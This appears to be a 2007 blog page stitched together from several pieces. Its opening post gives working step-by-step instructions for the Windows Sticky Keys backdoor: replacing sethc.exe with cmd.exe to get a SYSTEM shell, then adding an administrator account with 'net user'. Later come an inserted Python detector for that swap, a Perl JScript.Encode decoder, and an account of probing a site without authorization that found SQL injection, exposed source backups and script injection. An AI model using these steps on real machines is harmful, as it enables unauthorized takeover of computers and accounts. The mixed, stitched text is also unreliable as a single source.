Get a root account by doing the following.

start->run->system32

Back up cmd.exe and sethc.exe.

Copy cmd.exe to a different location and rename it sethc.

Copy it back to the system32 directory and accept the replacement of sethc.

Now press the Shift key 5 times and you will have a command prompt up.

Remember, you will need a normal account to do this. When you are done you can create your own account.

From the welcome screen press the Shift key 5 times.

Type net user <username> <password> /add

Don't exit the command prompt.

Now press Ctrl+Alt+Del 2 times; it will remove the welcome screen and bring up a login box.

Now type explorer.exe

You now have a console with the user name SYSTEM; from here you can do anything.

start->run->mmc

Press Ctrl+M, click Add, scroll down and add Local Users and Groups for the local computer. There should be a plus by it; click it and click the Users folder.

In the other window you should find the user name you added. Right click it, choose Properties, click the Member Of tab and then Add, type Administrators, click OK and close the mmc. Don't save if prompted to save.

start->logout

Type your user name and password and you are there, an admin of that computer.
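The sethc.exe swap described above leaves a simple trace on disk: the Sticky Keys binary becomes a byte-for-byte copy of cmd.exe. The following Python check is an added example, not code from the original post; it hashes both files in a directory and flags sethc.exe when its digest equals cmd.exe's or departs from a supplied known-good digest. The function names (`check_sethc`, `build_sample_dir`) and the sample bytes are my own; `build_sample_dir` writes constructed stand-in files into a temporary directory so the check runs anywhere, and on a real host you would point `check_sethc` at the System32 directory instead.

```python
import hashlib
import os
import tempfile


def sha256_of(path, chunk_size=1 << 16):
    """Return the hex SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def check_sethc(system32_dir, expected_sethc_sha256=None):
    """Compare sethc.exe against cmd.exe inside system32_dir.

    Returns a dict with both digests and a 'replaced' flag that is True when
    sethc.exe is a byte-for-byte copy of cmd.exe.  When a known-good digest
    for sethc.exe is supplied, 'baseline_ok' reports whether it still matches.
    """
    cmd_hash = sha256_of(os.path.join(system32_dir, "cmd.exe"))
    sethc_hash = sha256_of(os.path.join(system32_dir, "sethc.exe"))
    result = {
        "cmd_sha256": cmd_hash,
        "sethc_sha256": sethc_hash,
        "replaced": cmd_hash == sethc_hash,
    }
    if expected_sethc_sha256 is not None:
        result["baseline_ok"] = sethc_hash.lower() == expected_sethc_sha256.lower()
    return result


def build_sample_dir(cloned):
    """Create a constructed stand-in for System32 (not real Windows binaries).

    With cloned=True the fake sethc.exe is an exact copy of the fake cmd.exe,
    reproducing the on-disk state the procedure above leaves behind.
    """
    d = tempfile.mkdtemp(prefix="sys32_sample_")
    cmd_bytes = b"MZ-constructed-cmd-sample"          # constructed, not a real PE
    sethc_bytes = cmd_bytes if cloned else b"MZ-constructed-sethc-sample"
    with open(os.path.join(d, "cmd.exe"), "wb") as f:
        f.write(cmd_bytes)
    with open(os.path.join(d, "sethc.exe"), "wb") as f:
        f.write(sethc_bytes)
    return d


if __name__ == "__main__":
    for cloned in (False, True):
        r = check_sethc(build_sample_dir(cloned))
        print("sethc.exe is a copy of cmd.exe:", r["replaced"])
```

A baseline digest taken from a freshly installed machine makes the check stronger than the equality test alone, since it also catches sethc.exe being replaced by something other than cmd.exe.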

After finishing today's assessment, I went and Googled the problem of JS code encrypted with Microsoft's JS.Encode, and sure enough I found a Decode tool, and one written in my favourite language, Perl, heh. So I am posting the source code here.

#!/usr/local/bin/perl -w
# JScript.decode.pl - decodes Microsoft JScript.Encode blocks (#@~^ ... ^#~@)
use strict;

my $version = 1.0;

sub decode;

# Which of the three substitution tables applies at each position; the
# sequence repeats every 64 characters.
my @itable = (0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1,
              0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2,
              0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2,
              0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2);

# The three decoding tables, indexed by the encoded byte (0x00-0x7F).
# The entry 0xFF marks the escape character '@', which prefixes a two-byte
# sequence for the characters the encoder cannot emit directly.
my @dectab =
(
 [0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x57,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F,
  0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,
  0x2E,0x47,0x7A,0x56,0x42,0x6A,0x2F,0x26,0x49,0x41,0x34,0x32,0x5B,0x76,0x72,0x43,
  0x38,0x39,0x70,0x45,0x68,0x71,0x4F,0x09,0x62,0x44,0x23,0x75,0x3C,0x7E,0x3E,0x5E,
  0xFF,0x77,0x4A,0x61,0x5D,0x22,0x4B,0x6F,0x4E,0x3B,0x4C,0x50,0x67,0x2A,0x7D,0x74,
  0x54,0x2B,0x2D,0x2C,0x30,0x6E,0x6B,0x66,0x35,0x25,0x21,0x64,0x4D,0x52,0x63,0x3F,
  0x7B,0x78,0x29,0x28,0x73,0x59,0x33,0x7F,0x6D,0x55,0x53,0x7C,0x3A,0x5F,0x65,0x46,
  0x58,0x31,0x69,0x6C,0x5A,0x48,0x27,0x5C,0x3D,0x24,0x79,0x37,0x60,0x51,0x20,0x36],
 [0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x7B,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F,
  0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,
  0x32,0x30,0x21,0x29,0x5B,0x38,0x33,0x3D,0x58,0x3A,0x35,0x65,0x39,0x5C,0x56,0x73,
  0x66,0x4E,0x45,0x6B,0x62,0x59,0x78,0x5E,0x7D,0x4A,0x6D,0x71,0x3C,0x60,0x3E,0x53,
  0xFF,0x42,0x27,0x48,0x72,0x75,0x31,0x37,0x4D,0x52,0x22,0x54,0x6A,0x47,0x64,0x2D,
  0x20,0x7F,0x2E,0x4C,0x5D,0x7E,0x6C,0x6F,0x79,0x74,0x43,0x26,0x76,0x25,0x24,0x2B,
  0x28,0x23,0x41,0x34,0x09,0x2A,0x44,0x3F,0x77,0x3B,0x55,0x69,0x61,0x63,0x50,0x67,
  0x51,0x49,0x4F,0x46,0x68,0x7C,0x36,0x70,0x6E,0x7A,0x2F,0x5F,0x4B,0x5A,0x2C,0x57],
 [0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x6E,0x0A,0x0B,0x0C,0x06,0x0E,0x0F,
  0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,
  0x2D,0x75,0x52,0x60,0x71,0x5E,0x49,0x5C,0x62,0x7D,0x29,0x36,0x20,0x7C,0x7A,0x7F,
  0x6B,0x63,0x33,0x2B,0x68,0x51,0x66,0x76,0x31,0x64,0x54,0x43,0x3C,0x3A,0x3E,0x7E,
  0xFF,0x45,0x2C,0x2A,0x74,0x27,0x37,0x44,0x79,0x59,0x2F,0x6F,0x26,0x72,0x6A,0x39,
  0x7B,0x3F,0x38,0x77,0x67,0x53,0x47,0x34,0x78,0x5D,0x30,0x23,0x5A,0x5B,0x6C,0x48,
  0x55,0x70,0x69,0x2E,0x4C,0x21,0x24,0x4E,0x50,0x09,0x56,0x73,0x35,0x61,0x4B,0x58,
  0x3B,0x57,0x22,0x6D,0x4D,0x25,0x28,0x46,0x4A,0x32,0x41,0x3D,0x5F,0x4F,0x42,0x65]
);

if (scalar(@ARGV) < 2)
{
    print "\nJScript.decode.pl $version\n(c) Christophe Grosjean 01/2004\nUsage: JScript.decode.pl infile.htm outfile.htm\n";
    exit;
}

open(IN,  "<$ARGV[0]") || die "Can't open input file\n";
open(OUT, ">$ARGV[1]") || die "Can't open output file\n";

my $before;
my $coded;
my $after;

while (<IN>) {
    # An encoded block sits between the "#@~^" and "^#~@" markers; text on
    # either side of it is copied through unchanged.
    ($before, $coded, $after) = ($_ =~ /^(.*)\#@~\^(.*)\^\#~@(.*)$/);
    if (defined($coded)) {
        print OUT $before;
        decode($coded);
        print OUT $after;
        $coded = undef;
    }
    else {
        print OUT $_;
    }
}
close(IN);
close(OUT);
exit;

sub decode {
    my $coded   = shift;
    my $decoded = '';
    my $pos = 0;
    my $i   = 8;    # skip the 6-character length field and the "==" after the marker
    while ($i < length($coded)) {
        my $res = ord(substr($coded, $i++, 1));
        if ($res < 0x80) {
            $res = ${$dectab[$itable[$pos]]}[$res];
            # following char is marked as a special char
            if ($res == 0xFF) {
                $res = ord(substr($coded, $i++, 1));
                if    ($res == 0x26) { $res = 0x0A; }   # "@&" -> newline
                elsif ($res == 0x23) { $res = 0x0D; }   # "@#" -> carriage return
                elsif ($res == 0x2A) { $res = 0x3E; }   # "@*" -> '>'
                elsif ($res == 0x21) { $res = 0x3C; }   # "@!" -> '<'
                elsif ($res == 0x24) { $res = 0x40; }   # "@$" -> '@'
            }
        }
        # Bytes >= 0x80 pass through untouched; the table index still advances.
        $pos = ($pos + 1) & 0x3F;
        if ($res != 255) {
            $decoded .= chr($res);
        }
    }
    print OUT $decoded;
}

PS: I really hate it when websites snub Firefox like this. Why can't they just be W3C compatible?

After lunch I came back to a task from my boss: in the afternoon we were going to an organisation for a security-assessment meeting. He gave me that organisation's website address and told me to look for any security problems first.
I was still dazed and time was tight, but I had to grit my teeth and say yes.
After all, we had not been given their authorization, so I couldn't run a scanner against it, only analyse it passively. No problem, I have Firefox.
I started browsing the site.
Annoyingly, this site turned out to be Firefox-unfriendly: the page's JS files actually used Microsoft's obfuscator, JS.Encode. ft!
No way around it, so on to IE.
Set up a proxy, pointed IE at it, and got to work.
1024 characters omitted here...
Half an hour later I had found some interesting security problems:
1. For a news site, none of the news URLs did any SQL injection filtering whatsoever. Sweat.
2. When the site was published, the backup files produced by editing the source during development were never deleted, with the direct result that I could remotely view their server-side script source. Sweat again.
3. The guestbook let you write JS straight into it. Sweat to death.
With these findings, the afternoon's meeting naturally went fairly smoothly, so I suppose I didn't fail the mission o(∩_∩)o


© 2007 猪在笑